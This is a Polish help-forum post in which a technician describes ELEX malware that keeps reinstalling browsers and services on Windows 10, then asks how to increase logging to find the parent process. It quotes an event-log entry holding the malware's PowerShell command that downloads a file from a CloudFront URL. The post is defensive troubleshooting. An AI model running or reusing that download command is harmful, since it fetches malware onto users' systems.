Na nowym komputerze z Windows 10 przy instalacji jednego z programów, zainstalował się w systemie malware znany jako ELEX (przykładowe skanowanie jednego z plików, jakie pozostawił na dysku: https://www.virustotal.com/pl/file/f6f33f735d1501c4cfd1bc0056efe240395f30067383153f9e76655d264e3e26/analysis/).
Malware ten instaluje przeglądarkę Firefox i Chrome (lub ich zmodyfikowane wersje) oraz doinstalowuje kilka Usług.
Usuwałem te przeglądarki i usługi, ale co tydzień lub dwa instalują się ponownie (usługi pod różnymi mylącymi nazwami, np. Windows Cache Services). Poza tym zauważyłem w rejestrze, że dodaje też własne reguły na firewallu (malware uruchamia się z uprawnieniami
systemowymi).
Jestem informatykiem, więc chcę ręcznie znaleźć źródło problemu - jaki proces wciąż na nowo instaluje te programy i usługi - jednak logi Windowsa nie dają wystarczająco informacji.
Co udało mi się ustalić. Najwcześniejsze zdarzenia w Dzienniku Zdarzeń gdy ELEX ostatnim razem instalował na nowo swoje usługi i przeglądarki, to:
1. 24 maja o godz. 14:46:13 - dodanie usługi VBoxDrv (tak jest za każdym razem). Jednak logi nie pokazują:
- co zainstalowało tą usługę
- kiedy i co ją usunęło (nie widzę takiej usługi)
- kiedy ta usługa została wywołana
- co zrobiła ta usługa po jej instalacji i uruchomieniu
2. Mimo braku tych informacji w dzienniku systemu Windows, udało mi się znaleźć w dzienniku aplikacji PowerShell, że o godz. 14:45:20(niecałą minutę wcześniej) uruchomiony został PowerShell:
a pierwszą komendą była poniższa:
Wklejam pełną treść tego zdarzenia / komendy:
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.1.14393.1198
HostId=09b509b0-a3ea-4b69-9c01-267a6f75e81c
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $client = new-object System.Net.WebClient;$client.DownloadFile('http://d2hrpnfyb3wv3k.cloudfront.net/provide?clients=1D7A59692BE9806EF5F4311A5BB7AF30&reqs=visit.cpk.install.false','44')
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Jednak nie wydaje mi się, aby dawało to informację co wywołało te komendy PowerShell - tu więc trop się urywa.
Gdybym wiedział co wywołuje te komendy, mógłbym usunąć ten proces. Jak mogę zwiększyć dokładność logów, aby to ustalić?